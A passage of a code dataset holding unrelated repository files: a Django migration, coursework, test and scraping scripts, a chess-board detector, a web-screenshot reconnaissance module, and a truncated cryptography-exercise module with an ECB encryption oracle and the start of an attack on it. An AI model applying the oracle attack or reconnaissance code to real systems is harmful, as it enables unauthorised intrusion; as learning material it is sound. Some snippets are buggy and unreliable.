primary_key=True)),\n ('createdOn', models.DateTimeField(auto_now_add=True)),\n ('temperature', models.FloatField()),\n ('modeName', models.CharField(max_length=100)),\n ('modeInternalCode', models.CharField(max_length=4)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='SpecialSchedule',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('startDate', models.DateTimeField()),\n ('endDate', models.DateTimeField()),\n ('priority', models.IntegerField()),\n ('removed', models.BooleanField(default=False)),\n ('savingProposal', models.ForeignKey(default=None, blank=True, to='thermostats.SavingProposal', null=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='TemperatureMode',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('internal_code', models.CharField(default=b'CUST', max_length=4, choices=[(b'COMF', b'Confort'), (b'AWAY', b'Absent'), (b'NIGH', b'Nuit'), (b'CUST', b'Custom')])),\n ('name', models.CharField(default=b'Temp\\xc3\\xa9rature Utilisateur', max_length=100)),\n ('temperature', models.FloatField()),\n ('removable', models.BooleanField(default=True)),\n ('removed', models.BooleanField(default=False)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='Thermostat',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('createdOn', models.DateTimeField(auto_now_add=True)),\n ('name', models.CharField(default=b'', max_length=100, blank=True)),\n ('timezone', models.CharField(default=b'Europe/Paris', max_length=100)),\n ('address', models.CharField(default=b'', max_length=1024, blank=True)),\n ('uid', models.CharField(default=b'', max_length=128, blank=True)),\n ('apiKey', models.CharField(default=b'', max_length=128, blank=True)),\n ('startSavingPeriod', models.DateTimeField()),\n ('totalSavingForPeriod', models.FloatField(default=0.0)),\n ('boilerOn', models.BooleanField(default=False)),\n ],\n options={\n 'ordering': ('createdOn',),\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='ControlParameters',\n fields=[\n ('coef', models.FloatField(default=0.1)),\n ('thermostat', models.OneToOneField(primary_key=True, serialize=False, to='thermostats.Thermostat')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='BuildingParameters',\n fields=[\n ('annualEnergyBill', models.FloatField()),\n ('annualSubscriptionAmount', models.FloatField()),\n ('boilerType', models.CharField(default=b'GAS', max_length=4, choices=[(b'GAS', b'Gaz'), (b'OIL', b'Fuel'), (b'ELEC', b'Electrique')])),\n ('dju', models.FloatField()),\n ('thermostat', models.OneToOneField(related_name='building_parameters', primary_key=True, serialize=False, to='thermostats.Thermostat')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='WeekSchedule',\n fields=[\n ('thermostat', models.OneToOneField(primary_key=True, serialize=False, to='thermostats.Thermostat')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='WeekScheduleMarker',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('isoWeekDay', models.IntegerField()),\n ('hour', models.IntegerField()),\n ('minute', models.IntegerField()),\n ('temperatureMode', models.ForeignKey(to='thermostats.TemperatureMode')),\n ('weekSchedule', models.ForeignKey(to='thermostats.WeekSchedule')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='thermostat',\n name='owner',\n field=models.ForeignKey(related_name='thermostats', to=settings.AUTH_USER_MODEL),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='temperaturemode',\n name='thermostat',\n field=models.ForeignKey(to='thermostats.Thermostat'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='specialschedule',\n name='temperatureMode',\n field=models.ForeignKey(to='thermostats.TemperatureMode'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='specialschedule',\n name='thermostat',\n field=models.ForeignKey(to='thermostats.Thermostat'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='setpointhistory',\n name='thermostat',\n field=models.ForeignKey(related_name='set_point_history', to='thermostats.Thermostat'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='savingproposal',\n name='thermostat',\n field=models.ForeignKey(related_name='saving_proposal', to='thermostats.Thermostat'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='savinghistory',\n name='specialSchedule',\n field=models.ForeignKey(related_name='saving_history', blank=True, to='thermostats.SpecialSchedule', null=True),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='savinghistory',\n name='thermostat',\n field=models.ForeignKey(to='thermostats.Thermostat'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='measuredtemp',\n name='thermostat',\n field=models.ForeignKey(to='thermostats.Thermostat'),\n preserve_default=True,\n ),\n ]\n","repo_name":"damienlaine/djoro-server","sub_path":"thermostats/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":9390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"29310519267","text":"HW_SOURCE_FILE = __file__\n\n\ndef merge(lst1, lst2):\n \"\"\"Merges two sorted lists.\n\n >>> s1 = [1, 3, 5]\n >>> s2 = [2, 4, 6]\n >>> merge(s1, s2)\n [1, 2, 3, 4, 5, 6]\n >>> s1\n [1, 3, 5]\n >>> s2\n [2, 4, 6]\n >>> merge([], [2, 4, 6])\n [2, 4, 6]\n >>> merge([1, 2, 3], [])\n [1, 2, 3]\n >>> merge([5, 7], [2, 4, 6])\n [2, 4, 5, 6, 7]\n >>> merge([2, 3, 4], [2, 4, 6])\n [2, 2, 3, 4, 4, 6]\n \"\"\"\n if lst1 == [] or lst2 == []:\n return lst1 + lst2\n else:\n if lst1[0] < lst2[0]:\n return [lst1[0]] + merge(lst1[1:], lst2)\n else:\n return [lst2[0]] + merge(lst1, lst2[1:])\n\n\ndef remove_odd_indices(lst, odd):\n \"\"\"Remove elements of lst that have odd indices. Use recursion!\n\n >>> s = [1, 2, 3, 4]\n >>> t = remove_odd_indices(s, True)\n >>> s\n [1, 2, 3, 4]\n >>> t\n [1, 3]\n >>> l = [5, 6, 7, 8]\n >>> m = remove_odd_indices(l, False)\n >>> m\n [6, 8]\n >>> remove_odd_indices([9, 8, 7, 6, 5, 4, 3], False)\n [8, 6, 4]\n >>> remove_odd_indices([2], False)\n []\n >>> # Do not use while/for loops!\n >>> from construct_check import check\n >>> # ban iteration\n >>> check(HW_SOURCE_FILE, 'remove_odd_indices',\n ... ['While', 'For'])\n True\n \"\"\"\n if len(lst) <= 2:\n if odd:\n return [lst[0]]\n else:\n if len(lst) < 2:\n return []\n else:\n return [lst[1]]\n else:\n if odd:\n return [lst[0]] + remove_odd_indices(lst[2:], odd)\n return [lst[1]] + remove_odd_indices(lst[2:], odd)\n\n\nclass SmartFridge:\n \"\"\"\"\n >>> fridgey = SmartFridge()\n >>> fridgey.add_item('Mayo', 1)\n 'I now have 1 Mayo'\n >>> fridgey.add_item('Mayo', 2)\n 'I now have 3 Mayo'\n >>> fridgey.use_item('Mayo', 2.5)\n 'I have 0.5 Mayo left'\n >>> fridgey.use_item('Mayo', 0.5)\n 'Oh no, we need more Mayo!'\n >>> fridgey.add_item('Eggs', 12)\n 'I now have 12 Eggs'\n >>> fridgey.use_item('Eggs', 15)\n 'Oh no, we need more Eggs!'\n >>> fridgey.add_item('Eggs', 1)\n 'I now have 1 Eggs'\n \"\"\"\n\n def __init__(self):\n self.items = {}\n\n def add_item(self, item, quantity):\n if not item in self.items:\n self.items[item] = quantity\n else:\n self.items[item] += quantity\n return f'I now have {self.items[item]} {item}'\n\n def use_item(self, item, quantity):\n if quantity >= self.items[item]:\n self.items[item] = 0\n return f'Oh no, we need more {item}!'\n else:\n self.items[item] -= quantity\n return f'I have {self.items[item]} {item} left'\n\n\nclass VendingMachine:\n \"\"\"A vending machine that vends some product for some price.\n\n >>> v = VendingMachine('candy', 10)\n >>> v.vend()\n 'Nothing left to vend. Please restock.'\n >>> v.add_funds(15)\n 'Nothing left to vend. Please restock. Here is your $15.'\n >>> v.restock(2)\n 'Current candy stock: 2'\n >>> v.vend()\n 'Please update your balance with $10 more funds.'\n >>> v.add_funds(7)\n 'Current balance: $7'\n >>> v.vend()\n 'Please update your balance with $3 more funds.'\n >>> v.add_funds(5)\n 'Current balance: $12'\n >>> v.vend()\n 'Here is your candy and $2 change.'\n >>> v.add_funds(10)\n 'Current balance: $10'\n >>> v.vend()\n 'Here is your candy.'\n >>> v.add_funds(15)\n 'Nothing left to vend. Please restock. Here is your $15.'\n\n >>> w = VendingMachine('soda', 2)\n >>> w.restock(3)\n 'Current soda stock: 3'\n >>> w.restock(3)\n 'Current soda stock: 6'\n >>> w.add_funds(2)\n 'Current balance: $2'\n >>> w.vend()\n 'Here is your soda.'\n \"\"\"\n\n def __init__(self, name, price):\n self.name = name\n self.price = price\n self.stock = 0\n self.funds = 0\n\n def vend(self):\n if self.stock == 0:\n return 'Nothing left to vend. Please restock.'\n elif self.funds < self.price:\n res = self.price - self.funds\n return f'Please update your balance with ${res} more funds.'\n elif self.funds >= self.price:\n self.stock -= 1\n res = self.funds - self.price\n self.funds = 0\n if res == 0:\n return f'Here is your {self.name}.'\n return f'Here is your {self.name} and ${res} change.'\n\n def add_funds(self, funds):\n if self.stock == 0:\n return f'Nothing left to vend. Please restock. Here is your ${funds}.'\n else:\n self.funds += funds\n return f'Current balance: ${self.funds}'\n\n def restock(self, stock):\n self.stock += stock\n return f'Current {self.name} stock: {self.stock}'\n","repo_name":"Fontzs/CS61A","sub_path":"hw/hw04/hw04.py","file_name":"hw04.py","file_ext":"py","file_size_in_byte":4758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"21052445149","text":"from behave import given\nimport requests\nfrom pathlib import Path\n\n@given('the API is running')\ndef step_impl(context):\n # Make a GET request to the /health endpoint to check that the API is running\n response = requests.get(\"http://localhost:8000\")\n assert response.status_code == 200\n\n@then('the response status code should be \"{code}\"')\ndef step_impl(context, code):\n assert context.response.status_code == int(code) ","repo_name":"slavaklevleev/uiprpo_lab8_2","sub_path":"features/steps/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"42967146232","text":"import csv\n# import sele\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\n\nfrom selenium.webdriver.chrome.options import Options\n\n# # sesuaikan dengan driver browser\n# option = webdriver.ChromeOptions()\n# # komment ketika tidak ingin menampilkan browser\n# option.add_argument('headless')\n# driver = webdriver.Chrome(\n# './chromedriver_win32/chromedriver.exe', options=option)\n\n# uncoment ketika ingin menampilkan browser\ndriver = webdriver.Chrome('./chromedriver_win32/chromedriver.exe')\n# input URL nya disini\ndriver.get(\"http://13.250.157.96/\")\n\n# test laoding time dan speed time....\nnavigationStart = driver.execute_script(\n \"return window.performance.timing.navigationStart\")\ndomContentLoadedEventEnd = driver.execute_script(\n \"return window.performance.timing.domContentLoadedEventEnd\")\nloadEventEnd = driver.execute_script(\n \"return window.performance.timing.loadEventEnd\")\n\nbackendPerformance = (domContentLoadedEventEnd - navigationStart)/1000\nfrontendPerformance = (loadEventEnd - navigationStart)/1000\n\n# csv output\n\n# open file / inisialisasi filenya\nf = open('./csv_output/test.csv', 'w')\n\nheader = ['page', 'duration load', 'page load', 'status']\ndata = [driver.title, backendPerformance, frontendPerformance, 'success']\n\n# buat CSV nya\nwriter = csv.writer(f)\n\n# header\nwriter.writerow(header)\n# wire data\nwriter.writerow(data)\n\n# generate datanya\nprint(writer)\nf.close()\n\nprint(backendPerformance, \"load script data\", driver.title)\nprint(frontendPerformance, \"load performance page\", driver.title)\nprint()\ndriver.close()\n","repo_name":"taqwaDev/selenium-python-boilerplate","sub_path":"sele.py","file_name":"sele.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"28766302759","text":"'''\r\nCreated on Nov 10, 2018\r\n\r\n@author: Winterberger\r\n'''\r\n##from math import \r\ndef average(*args):\r\n num = sum(args)\r\n print(num)\r\n den = len(args)\r\n print (den)\r\n average = float(num/den)\r\n return average\r\n\r\n\r\nArgument = []\r\ni = 0\r\nprint(Argument[i])\r\nwhile (Argument[i] >= 0):\r\n Argument[i] = input(\"Input next value to take average of: \")\r\n i += 1\r\n\r\nprint(average(Argument))","repo_name":"ee1tbg/elanFirstPyProj","sub_path":"src/Average.py","file_name":"Average.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"41928531859","text":"\n\ndef max_sum_non_adj(lst):\n \"\"\"\n Time: O(n)\n Space: O(1)\n \"\"\"\n res = lst[-1]\n i = len(lst)-2\n b, c, d = True, True, True\n\n while i >= 0:\n a = False\n if not b:\n res += lst[i]\n a = True\n elif lst[i] > lst[i+1]:\n res += lst[i] - lst[i+1]\n a, b = True, False\n if b == c == d == False:\n res += lst[i+2]\n c = True\n b, c, d = a, b, c\n i -= 1\n\n return res\n\n\nsolution = max_sum_non_adj\n\ntest_cases = [\n # input, output\n ([5, 2, 1, 1, 5], 11),\n ([2, 4, 6, 2, 5], 13),\n]\n\nfor inp, out in test_cases:\n print(\"input: \", inp)\n print(\"expected:\", out)\n print(\"got: \", solution(inp))\n print()\n","repo_name":"bbriano/daily-coding-problem","sub_path":"2021-02-27:max_sum_non_adj.py","file_name":"2021-02-27:max_sum_non_adj.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"17601680867","text":"from hyperopt import hp, fmin, tpe, Trials, STATUS_OK\n\nspace = hp.choice('classifier_type', [\n {\n 'type': 'naive_bayes',\n },\n {\n 'type': 'svm',\n 'C': hp.lognormal('svm_C', 0, 1),\n 'kernel': hp.choice('svm_kernel', [\n {'ktype': 'linear'},\n {'ktype': 'RBF', 'width': hp.lognormal('svm_rbf_width', 0, 1)},\n ]),\n },\n {\n 'type': 'dtree',\n 'criterion': hp.choice('dtree_criterion', ['gini', 'entropy']),\n 'max_depth': hp.choice('dtree_max_depth',\n [None, hp.qlognormal('dtree_max_depth_int', 3, 1, 1)]),\n 'min_samples_split': hp.qlognormal('dtree_min_samples_split', 2, 1, 1),\n },\n ])\nprint(space['type'])\n","repo_name":"baochi0212/Bayesian-optimization-practice-","sub_path":"dcm.py","file_name":"dcm.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"14559793975","text":"# assume this is run after detect.py has been run, this means that the images in data/images\n# have corresponding data in labels\nfrom PIL import Image\nimport numpy as np\nimport pandas as pd\nimport os\nimport random\nimport sklearn\nimport skimage\nimport skimage.io\nimport matplotlib.pyplot as plt\nimport detect\nimport time\nimport pathlib\nimport sys\n\nPROJECT_DIR = str(pathlib.Path(__file__).parent.absolute()) + \"/\"\nTO_CROP_LABELS_DIR = PROJECT_DIR + \"data/cropped/labels\"\nCROPPED_DIR = PROJECT_DIR + \"data/cropped\"\nOUTPUT_DIR = PROJECT_DIR + \"data/output_files\"\n\nCROP_MODEL = PROJECT_DIR + \"cropModel.pt\"\nPIECE_MODEL = PROJECT_DIR + \"pieceModel.pt\"\n\n# get command line arguments\n_, INPUT_DIR, upload_number = sys.argv\nCROPPED_DIR = CROPPED_DIR + \"/\" + upload_number\n\nif not os.path.exists(CROPPED_DIR):\n os.mkdir(CROPPED_DIR)\n\n# rename input files to be 1->N\ndetected_files = []\nfor (dirpath, dirnames, filenames) in os.walk(INPUT_DIR):\n for i, file in enumerate(filenames):\n # convert not png to png\n try:\n if file.split(\".\")[-1] != \".png\" and file.split(\".\")[-1] in [\n \"jpg\",\n \"jpeg\",\n \"png\",\n ]:\n im = Image.open(INPUT_DIR + \"/\" + file)\n im.save(INPUT_DIR + \"/\" + file)\n detected_files.append(file)\n else:\n raise FileNotFoundError\n except Exception as e:\n print(\"couldn't open file\")\n print(e)\n exit(0)\n\n\n# start off by running the crop model on the input images\ncrop_data = detect.detect(INPUT_DIR, CROP_MODEL, CROPPED_DIR)\n\n\ndef crop_image(file, possible_chessboards, output_filename, output_dir):\n width, height = image.size\n # find the most confident of the chessboards here\n # but for now just get the first one\n most_confident_chessboard = sorted(possible_chessboards, key=lambda row: row[5])[0]\n (\n class_id,\n center_x,\n center_y,\n box_width,\n box_height,\n confidence,\n ) = most_confident_chessboard\n pixel_center_x = width * center_x\n pixel_center_y = height * center_y\n pixel_box_width = width * box_width\n pixel_box_height = height * box_height\n box_top_left_x = pixel_center_x - pixel_box_width / 2\n box_top_left_y = pixel_center_y - pixel_box_height / 2\n\n left = box_top_left_x\n top = box_top_left_y\n right = box_top_left_x + pixel_box_width\n bottom = box_top_left_y + pixel_box_height\n cropped_image = image.crop((left, top, right, bottom))\n cropped_image = cropped_image.resize((1200, 1200))\n\n # image.show()\n cropped_image.save(output_dir + \"/\" + output_filename)\n return list(most_confident_chessboard)\n\n\ncrops = []\nfor i in range(len(detected_files)):\n image = Image.open(INPUT_DIR + \"/\" + detected_files[i])\n chessboard = crop_image(image, crop_data[i], detected_files[i], CROPPED_DIR)\n crops.append(chessboard)\n\n\n# then we run those cropped images through the piece model\ndetected_pieces = detect.detect(CROPPED_DIR, PIECE_MODEL, OUTPUT_DIR)\n\n\n# this outputs files that we can process into the final chess board!\nfen_array = [\"P\", \"N\", \"B\", \"R\", \"K\", \"Q\", \"p\", \"n\", \"b\", \"r\", \"k\", \"q\"]\n\n\ndef board_to_fen(board):\n fen_str = \"\"\n for y in range(8):\n if y > 0:\n fen_str += \"/\"\n row = board[y]\n counter = 0\n row_str = \"\"\n for x in range(8):\n piece = row[x]\n if piece == 12:\n counter += 1\n else:\n if counter != 0:\n row_str += str(counter)\n counter = 0\n row_str += fen_array[int(piece)]\n if counter != 0:\n row_str += str(counter)\n fen_str += row_str\n\n # who's turn is it\n # fen_str += \" w\"\n\n # who can castle and what was the last move\n # fen_str += ' - -'\n return fen_str\n\n\nfens = []\n\nfor i in range(len(detected_files)):\n # intialize the boards all empty\n combined_confidence = 0\n total_number_of_pieces = 0\n board = [[12 for x in range(8)] for y in range(8)]\n for piece in detected_pieces[i]:\n class_id, center_x, center_y, box_width, box_height, confidence = piece\n if confidence < 0.85:\n continue\n combined_confidence += confidence\n # split the center_x/y into the 8th it belongs in\n x_pos = int(center_x // (0.125))\n y_pos = int(center_y // (0.125))\n board[y_pos][x_pos] = class_id\n total_number_of_pieces += 1\n fens.append(board_to_fen(board))\n\nif len(fens) == 1:\n with open(OUTPUT_DIR + \"/\" + upload_number + \".txt\", \"w+\") as f:\n f.write(\"0\\n\")\n f.write(\" \".join([str(x) for x in crops[0]]) + \"\\n\")\n f.write(fens[0] + \"\\n\")\n exit(0)\nelse:\n with open(OUTPUT_DIR + \"/\" + upload_number + \".txt\", \"w+\") as f:\n f.write(\"1\\n\")\n exit(0)\n","repo_name":"AndrewLaird/ChessTutorModels","sub_path":"get_fen_from_image.py","file_name":"get_fen_from_image.py","file_ext":"py","file_size_in_byte":4897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"31148181930","text":"from lib.core.module import BaseModule\nfrom urlparse import urlparse\nimport os\n\n\nclass Module(BaseModule):\n\n meta = {\n 'name': 'Website Screenshots',\n 'author': 'Sion Dafydd',\n 'description': 'Take screenshots of hosted websites using the PhantomJS tool.',\n 'query': \"SELECT ports.service || '://' || ports.ip_address || ':' || ports.port || '|' || COALESCE(hosts.host, '') FROM ports JOIN hosts ON ports.ip_address=hosts.ip_address WHERE ports.service LIKE 'http%' AND ports.ip_address NOT NULL ORDER BY ports.ip_address\",\n 'options': (\n ('path', os.path.join(BaseModule.workspace, 'webshot'), True, 'path for output'),\n ),\n }\n\n def module_run(self, targets):\n # Check if WhatWeb is installed\n bin_path = self.whereis('phantomjs')\n if bin_path is None:\n self.error(\"PhantomJS is not installed or could not be found in system path\")\n return\n\n for target in targets:\n line = target.rsplit('|')\n\n url = line[0]\n u_parse = urlparse(url, allow_fragments=False)\n # Append a slash to the the url if there is no defined path\n if u_parse.path == '':\n url += '/'\n u_parse = urlparse(url, allow_fragments=False)\n\n if line[1] and line[1] != '':\n vhost = line[1]\n else:\n vhost = u_parse.hostname\n\n path = self.options['path']\n filename = self.generate_uniq_filename(\n prefix=\"%s-[%s]-\" % (url.replace(\"//\", \"_\").replace(\":\", \"_\").replace(\"/\", \"_\"), vhost), suffix='png')\n file_path = os.path.join(path, filename)\n\n # Create the directory structure required to store the log output\n if not os.path.exists(path):\n os.makedirs(path)\n\n proxy = ''\n if self._global_options['proxy']:\n proxy = \"--proxy=%s\" % self._global_options['proxy']\n\n # Compile command string and execute\n command = \"%s --ignore-ssl-errors=yes --ssl-protocol=ANY %s \\\"%s\\\" %s %s \\\"%s\\\" 1024px*768px\" % (\n bin_path, proxy, os.path.join(self.data_path, 'webshot.js'), url, vhost, file_path)\n output = self.shell(command, suppress_stdout=True)\n if output == '':\n self.output(\"Screenshot of %s [Host:%s] saved.\" % (url, vhost))\n else:\n self.error(\"Screenshot of %s [Host:%s] failed, %s\" % (url, vhost, output.rstrip()))\n","repo_name":"sidaf/workbench","sub_path":"modules/discovery/ports-output/webshot.py","file_name":"webshot.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"10041449319","text":"from openpyxl import load_workbook\nimport requests\nimport time\nfrom bs4 import BeautifulSoup\nimport json\n#import re\n\nwb = load_workbook(filename = '/Users/PJ/Downloads/eu_stations.xlsx')\nsheet_id1 = wb['08f9v-b1ow0']\n#sheet_id2 = wb['liens']\n\nrow = 0\n\nfor n1 in range(4454,5717):\n cell_code= \"A\" + str(n1)\n cell_no= \"B\" + str(n1)\n\n code = sheet_id1[cell_code].value\n #print(code)\n\n #https://airindex.eea.europa.eu/Map/AQI/Viewer/instant?dt=2020-08-26T10%3A00%3A00.000Z&st=DEBY004\n url_ok = \"https://airindex.eea.europa.eu/Map/AQI/Viewer/instant?dt=2020-08-26T10%3A00%3A00.000Z&st=\"+str(code)\n print(url_ok)\n print(n1)\n response= requests.get(url_ok) \n time.sleep(3)\n jsonparsed = (json.loads(response.text))\n for n2 in range(0,len(jsonparsed)):\n try:\n if jsonparsed[n2][\"PollutantId\"] == 423:\n if jsonparsed[n2][\"BandId\"] != 0:\n sheet_id1[cell_no] = 1\n \n wb.save('/Users/PJ/Downloads/eu_stations.xlsx')\n except:\n sheet_id1[cell_no] = \"timeout\"\n #for n1 in range(0,len(jsonparsed)):\n \n \n #source_code = response.text\n #print(source_code)\n \n # result = re.fullmatch('[ ]*jsonFlickrApi[ ]*\\((.+?)\\)[ ]*', source_code)\n\n # photos = jsonparsed[\"photos\"][\"photo\"]\n\n # for n2 in range(0,len(photos)):\n #print(photos[n2])\n","repo_name":"pjgueno/no2","sub_path":"doc/no2.py","file_name":"no2.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"83"} +{"seq_id":"8796049261","text":"from __future__ import division\nimport math\nimport random\nfrom Crypto.Cipher import AES\n\n# helpers\n\ndef xor(arr1, arr2):\n \"\"\"XOR two byte arrays. Shorter array should be passed second.\"\"\"\n if len(arr2) < len(arr1):\n l1, l2 = len(arr1), len(arr2)\n arr2 = arr2 * int(l1 / l2) + arr2[:l1 % l2]\n return bytearray(c1 ^ c2 for c1, c2 in zip(arr1, arr2))\n\ndef gen_rand_key(size=16):\n \"\"\"Generate random key (default 16 bytes).\"\"\"\n return bytearray([random.SystemRandom().randint(0, 255)\n for _ in xrange(size)])\n\n# padding\n\ndef pad_pkcs7(key, block_len=16):\n \"\"\"Pad given key using PKCS#7.\n Args\n key: byte array of key to pad\n block_len: length of block to which to pad key\n Returns\n bytearray of padded key\n \"\"\"\n if block_len == len(key):\n pad_len = block_len\n else:\n pad_len = block_len - len(key)\n return key + bytearray([pad_len] * pad_len)\n\ndef strip_pkcs7(input, raise_error=True):\n \"\"\"Strip PKCS7 padding from input. Raise error if invalid padding.\n Call with raise_error=False for testing with assertions.\n \"\"\"\n padding = input[-1]\n valid = True\n for i in xrange(1, padding + 1):\n if i > len(input):\n if raise_error:\n raise IndexError('Padding too long for input')\n valid = False\n break\n if input[-i] != padding:\n if raise_error:\n raise ValueError('Invalid padding detected')\n valid = False\n\n return input[:-padding] if valid else False\n\ndef gen_blocks(code, pad=pad_pkcs7, size=16):\n \"\"\"Generate blocks from given bytearray code and pad function.\"\"\"\n num_blocks = int(math.ceil(len(code) / size))\n blocks = [code[i * size: i * size + size] for i in xrange(num_blocks)]\n\n # PKCS#7 adds extra block if last code block matches block size\n if pad == pad_pkcs7:\n padded = pad(blocks[-1], size)\n last = ([padded] if size != len(blocks[-1]) else\n [padded[:size], padded[size:]])\n # no padding specified\n else:\n last = [blocks[-1]]\n\n return blocks[:-1] + last\n\n# ECB\n\ndef apply_ECB(mode, input, key, pad=pad_pkcs7):\n \"\"\"Apply ECB to given key and inputs.\n Args\n mode: str, 'encrypt' or 'decrypt'\n input: bytearray of input code\n key: AES key object in ECB mode\n pad: padding function to use on input\n Returns\n Bytearray of encrypted or decrypted input.\n \"\"\"\n blocks = gen_blocks(input, pad if mode == 'encrypt' else None)\n aes_f = key.encrypt if mode == 'encrypt' else key.decrypt\n input_str = ''.join([str(block) for block in blocks])\n return bytearray(aes_f(input_str))\n\n# CBC\n\ndef CBC_encrypt(aes_f, blocks):\n \"\"\"CBC encrypt: first XOR then encrypt.\"\"\"\n prev = blocks[0]\n output = bytearray()\n for block in blocks[1:]:\n xor_arr = xor(prev, block)\n enc_arr = bytearray(aes_f(str(xor_arr)))\n prev = enc_arr\n output.extend(enc_arr)\n return output\n\ndef CBC_decrypt(aes_f, blocks):\n \"\"\"CBC decyrpt: first decrypt then XOR.\"\"\"\n prev = blocks[0]\n output = bytearray()\n for block in blocks[1:]:\n dec_arr = bytearray(aes_f(str(block)))\n xor_arr = xor(dec_arr, prev)\n prev = block[:]\n output.extend(xor_arr)\n return strip_pkcs7(output)\n\ndef apply_CBC(mode, input, key, iv=None, block_len=16):\n \"\"\"Apply CBC to given input, key, and iv values.\n Args\n mode: str, 'encrypt' or 'decrypt'\n input: bytearray of intput code\n key: str, key to use as AES key\n iv: bytearray, initialization vector for CBC\n block_len: int, optional, normally 16 for block size\n Returns\n Bytearray of encrypted or decrypted input.\n \"\"\"\n key_AES = AES.new(str(key), AES.MODE_ECB)\n iv_AES = bytearray([0] * block_len) if not iv else iv\n\n pad = pad_pkcs7 if mode == 'encrypt' else None\n blocks = [iv_AES] + gen_blocks(input, pad, len(key))\n \n return (CBC_encrypt(key_AES.encrypt, blocks) if mode == 'encrypt' else\n CBC_decrypt(key_AES.decrypt, blocks))\n\n# ECB / CBC Encryption and Detection Oracle\n\ndef encrypt_ECB_CBC(text, noise=True, force_ECB=False, noise_vals=None,\n fixed_key=None):\n \"\"\"Encrypt given text in ECB or CBC, randomly with noise unless specified.\n Args\n text: bytearray of plaintext to encrypt\n noise: bool, add 5 - 10 random before and after text, default True\n force_ECB: bool, force ECB if set to True, default False\n noise_vals: tuple, optional bytearray values to (prepend, append)\n fixed_key: bytearray, optional fixed key to use in encryption\n Returns\n Bytearray of encrypted text.\n \"\"\"\n if noise and not noise_vals:\n size1 = random.SystemRandom().randint(5, 10)\n size2 = random.SystemRandom().randint(5, 10)\n text = gen_rand_key(size1) + text + gen_rand_key(size2)\n elif noise and noise_vals:\n pre, app = noise_vals\n text = pre + text + app\n\n # encrypt with ECB or CBC, optionally forcing ECB and fixed key\n key = gen_rand_key() if not fixed_key else fixed_key\n ECB = random.SystemRandom().randint(0, 1)\n\n if ECB or force_ECB:\n code = apply_ECB('encrypt', text, AES.new(str(key), AES.MODE_ECB))\n else:\n code = apply_CBC('encrypt', text, key, gen_rand_key())\n return code\n\ndef gen_ECB_oracle(full_code, rand_prefix=0):\n \"\"\"Return an ECB oracle function with set of fixed parameters.\n Args\n full_code: bytearray of bytes to encrypt\n rand_prefix: int of max number of rand bytes to prefix, default 0\n Returns\n parameterized ECB encryption function\n \"\"\"\n key = gen_rand_key()\n\n def call_encrypt(text, code=full_code):\n \"\"\"Call ECB encryption with given code to append and fixed key.\"\"\"\n if rand_prefix:\n length = random.SystemRandom().randint(0, rand_prefix)\n prefix = gen_rand_key(length)\n else:\n prefix = bytearray()\n return encrypt_ECB_CBC(text, True, True, (prefix, code), key)\n return call_encrypt\n\ndef repeated_blocks(blocks, threshold=2):\n \"\"\"Retrun True if list of blocks > count of dups more than theshold.\"\"\"\n blocks_list = [str(block) for block in blocks]\n blocks_set = set(blocks_list)\n return len(blocks_list) - len(blocks_set) > threshold\n\ndef detect_ECB(encrypt):\n \"\"\"Return True if given function encrypts with ECB, else False.\n Check for repeated blocks given deterministic input.\n \"\"\"\n text = bytearray(['A'] * 100)\n code = encrypt(text)\n blocks = gen_blocks(code)\n return True if repeated_blocks(blocks, 3) else False\n\n# ECB Attack\n\ndef blocks_aligned(code, block_len, max_rand):\n \"\"\"Check if code contains repeating blocks.\n Code contains max_rand number of random bytes as prefix; check if the\n prefix happens to divisible by the block length, whcih can be observed by\n repeating blocks immediately following the prefix. Return first index\n following repeating blocks if available, else 0.\n \"\"\"\n start1, start2, start3 = 0, 0 + block_len, 0 + (block_len * 2)\n 